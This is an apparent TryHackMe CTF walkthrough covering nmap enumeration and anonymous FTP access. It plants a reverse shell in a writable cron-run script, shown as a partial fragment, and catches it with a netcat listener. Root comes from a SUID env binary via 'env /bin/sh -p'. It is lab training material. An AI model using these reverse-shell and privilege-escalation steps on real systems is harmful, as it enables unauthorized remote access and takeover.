A quite minimalistic CTF from tryhackme.com – lets dive right in:
What does nmap say?
sudo nmap -sV 10.10.51.126
There we have the first answers to the challenge: 4 Services are running, FTP on 21 and smb on 139 and 445.
Now we need to look at the smb shares:
Next answer: the share we are looking for is pics.
Now we are looking for the flags.
Let’s see what ftp can do for us.
Anonymous login works.
That looks good. 3 files, we can read all of them and write to the shell script. Lets download them and look into them.
to_do.txt only tells us that the admin is planning to block anonymous access. Good idea but doesn*t help.
So let’s cat out removed_files.log
Not too interesting either.
Let’s move on to the bash script.
Now things are beginning to make sense.
clean.sh writes into the removed_files.log. Knowing that there where a lot of lines in the log file we can assume that clean.sh is automatically and periodically called by a cron job.
We also know that we can write to the file. So let’s just plant a reverse shell into that script, setup netcat on our side and see if we get a shell when eventually on the target the cron job fires.
cat <&5 | while read line; do $line 2>&5 >&5; done
And in out ftp session:
put clean.sh clean.sh
On our local machine we start our usual netcat listener
nc -l 1234
and wait …
And here we go. Let’s look around.
We found the user flag
To get ideas on how to become root let’s use linpeas.
We start a webserver locally and upload the file to our target.
So on our local machine:
python3 -m http.server
And on the target machine:
chmod +x linpeas.sh
In the SUID sections we find this line
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
With this we find something on
From there we use
env /bin/sh -p
and we are root.
So our root flag is